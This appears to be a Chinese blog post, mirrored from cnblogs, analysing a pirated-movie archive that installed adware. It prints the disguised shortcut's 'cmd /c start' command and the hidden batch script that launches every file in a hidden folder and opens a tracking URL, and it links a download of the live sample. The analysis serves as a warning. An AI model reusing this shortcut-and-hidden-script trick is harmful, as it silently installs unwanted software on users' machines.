码迷,mamicode.com
首页 > 其他好文 > 详细

一次遇到流氓软件的经历

时间:2014-04-29 17:59:44      阅读:411      评论:0      收藏:0      [点我收藏+]

标签:com   http   class   blog   style   div   img   code   java   javascript   tar   

想看一部电影,下载好后,点开然后发现系统被装了一堆流氓软件,于是分析了压缩包的内容,发现些有趣的东西。

首先解压压缩包,进入解压后文件夹,发现都是链接(当时看到文件夹图标就点开了)

 

mamicode.com,码迷

看看那个带有文件夹图标的属性

mamicode.com,码迷

首先这是个快捷方式,然后运行一个命令

mamicode.com,码迷
%windir%\system32\cmd.exe /c start 20140210\10.bat
mamicode.com,码迷

cmd运行一个脚本,那个脚本在哪里呢,开启显示隐藏文件的属性后,再看那个解压后的文件夹

mamicode.com,码迷

多了一个隐藏文件夹,打开一看

 

mamicode.com,码迷

10.bat 那个脚本文件找到了,记事本打开看看

mamicode.com,码迷
@echo off
for /f "delims=" %%a in (dir 20140210\  /s /b /a-d^|findstr /v /i "10.bat") do (start "" "%%a")
start http://t.hao168.pw/akdata/load.html?baidu-20140210-冰雪奇缘迅雷种子_高清完整BD版种子
exit
mamicode.com,码迷

基本意思就是运行文件夹”冰雪奇缘迅雷种子_高清完整BD版种子”中exe文件

mamicode.com,码迷

 

 

原理很简单,但是很容易中招,如果那个脚本运行的是一些危害计算机的代码,麻烦就大了。

有兴趣研究的可下载看看,不过要小心不要运行那个快捷方式

http://pan.baidu.com/s/1o60RYp8

一次遇到流氓软件的经历,码迷,mamicode.com

一次遇到流氓软件的经历

标签:com   http   class   blog   style   div   img   code   java   javascript   tar   

原文地址:http://www.cnblogs.com/cpointer/p/3698045.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!